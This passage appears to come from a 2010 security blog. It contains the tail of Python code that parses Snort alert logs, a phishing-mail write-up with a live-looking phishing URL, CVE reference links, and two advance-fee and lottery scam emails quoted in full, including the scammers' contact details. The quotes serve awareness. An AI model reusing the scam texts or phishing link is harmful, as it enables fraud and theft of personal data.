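    source = "rule" if gid == 1 else "preprocessor"   # GID 1 is the rules engine
    rec = {"gid": gid, "sid": sid, "rev": rev, "msg": m.group(4), "source": source,
           "generator": GENERATORS.get(gid, "unknown")}
    if gen_msg is not None and source == "preprocessor":
        # a preprocessor SID missing from gen-msg.map usually means a version mismatch
        rec["in_gen_msg_map"] = (gid, sid) in gen_msg
    return rec


def parse_alert_log(text, gen_msg=None):
    """Parse every alert line in a log; non-alert lines are ignored."""
    records = (parse_alert(line, gen_msg) for line in text.splitlines())
    return [r for r in records if r is not None]


if __name__ == "__main__":
    for rec in parse_alert_log(SAMPLE_ALERTS, load_gen_msg_map(GEN_MSG_MAP)):
        print(rec)
```

In practice the GID:SID pair is the key to count, tune or suppress on; the revision tells you which version of the rule fired, which matters when comparing alerts across sensors running different rule sets.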
For a detailed description of these concepts refer to the Snort Users Manual.



Friday, June 11, 2010

twitter Phishing

This was a phishing mail, themed on Twitter, in my spam box; out of curiosity I opened it to dig deeper. A sample of the mail can be seen in the picture below.


Hovering the mouse over the URL in the mail, or over the "Twitter Support" link, reveals the phishing URL.

http://84.51.21.51/~chatliam/mepw.html

Opening the link will redirect us to

http://tirearoma.com/

I didn't find anything malicious on the tirearoma.com page. The phishing mail might just be there to drive hits to "tirearoma.com", pay-per-click!!!

The page it redirects to is full of capsules related to Viagra and the like.


Happy browsing !!!

Wednesday, June 2, 2010

First Vulnerability I Found: CVE-2010-2091

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2091

http://xforce.iss.net/xforce/xfdb/58835

http://www.securityfocus.com/archive/1/archive/1/511401/100/0/threaded

http://www.exploit-db.com/exploits/12728

Tuesday, May 11, 2010

SPAM Mails: Part 2

Following is a spam mail that most of us have received and that many have ended up replying to.

Dearest One,


Good a thing to write you. I have a proposal for you; this however is not
mandatory nor will I in any manner compels you to honour against your
will.

I am Aisha Al- Salam, 23years old and the only daughter of my late
parents Mr.and Mrs.Hassan Al-salam my father was a highly reputable
business magnet - (a cocoa merchant) who operated in the capital of Cote
D Ivorie during his days.

It is sad to say that he passed away mysteriously in France during one of
his business trips abroad year 12th.Febuary 2007. Though his sudden death
was linked or rather suspected to have been masterminded by an uncle of
his who travelled with him at that time. But God knows the truth! My
mother left me when I was just 4 years old, and since then my father took
me so special.

Before his death on February 12th 2007 he called his secretary who
accompanied him to the hospital and told him that he has the sum of 7.5
million, United States Dollars.(USD$7,500.000 ) left in one of the
Leading Bank in Cote D Ivorie and he deposited the money in my name in
the bank as the next kins.

I am just 23 years old and a university undergraduate and really don't
know what to do. Now I want a foreign partner overseas where I can
transfer this fund. This is because I have suffered a lot of set backs as
a result of incessant political crisis here in Cote D Ivorie . The death
of my father actually brought sorrow to my life.

Sir, I am in a sincere desire of your humble assistance in this
regards.Your suggestions and ideas will be highly regarded. Now permit me
to ask these few questions:-

1. Can you honestly help me as your daughter?
2. Can I completely trust you?
I have decided to offer you 30% of the total amount for your willingness
to help me, Please kindly response to my mail immediately with your full
personal information, telephone number so that I can call and speak with
you on the telephone.

Please, consider this and get back to me as soon as possible.

Thank you so much.
Insallah .

My sincere regards,
Ms Aisha Al Salam.

SPAM Mails: Part 1

Below is a spam mail I received in my inbox. To make it look realistic the spammers went a step further and supplied contact numbers and a few images, to entice recipients into handing over their personal information.

FROM THE DESK OF THE DIRECTOR:
UK INTERNATIONAL LOTTERY PRIZE AWARD DEPT

WINNING NOTIFICATION FOR CATEGORY "A" WINNER ONLY

Amount Won: £1,000,000.00 Pounds

Dear Lucky winner,

We are glad to inform you that you have won a prize money of One Million
Great Britain Pound Sterlings (£1,000,000.00) in our last lottery promotional
draw.

We are pleased to inform you of the final announcement of the result in
UK INTERNATIONAL LOTTERY PRIZE AWARD DEPT. Your email address was selected by our Electronic Random Selection System (ERSS) from an exclusive list of e-mail addresses of individual and corporate bodies. No tickets were sold.

With Ref.Number: GP 14-M-246-04,
Batch Number: 573881545-UK/2010
Ticket Number: PP3502/8707-01.

CONGRATULATIONS!!!:
To file for Your Claims Please contact.
********************************************
Name: MR JOSEPH POUNCH
Tel:+447014275315
Email:
josephpounch18@gmail.com
*******************************************
However you will have to fill and submit this form to the events manager for
verification & direction on how you canclaim your winning fund.
Fill the Details Below:
1. Full name...............
2. Contact Address......
3. Age.........................
4. Mobile Number.........
5. Marital Status..........
6. Sex.........................
7. Occupation..............
8. Company................
9.State:......................
10.Country..................
11.Nationality...............
12.Address.................
13.Valid ID Proof (Send as email attachment)
Your Reference and Batch number at the top of this mail:

Mrs Vivian Jones.
Lottery Coordinator

Most netizens fall prey to this and end up providing their information. The details asked for above (full name, age, address, occupation, marital status and a scanned ID) are exactly what an attacker needs to guess passwords and security-question answers with informed guesses, or to impersonate the victim.

Before providing information in reply to such mails, think once: "who in this world is going to give away free money!!!"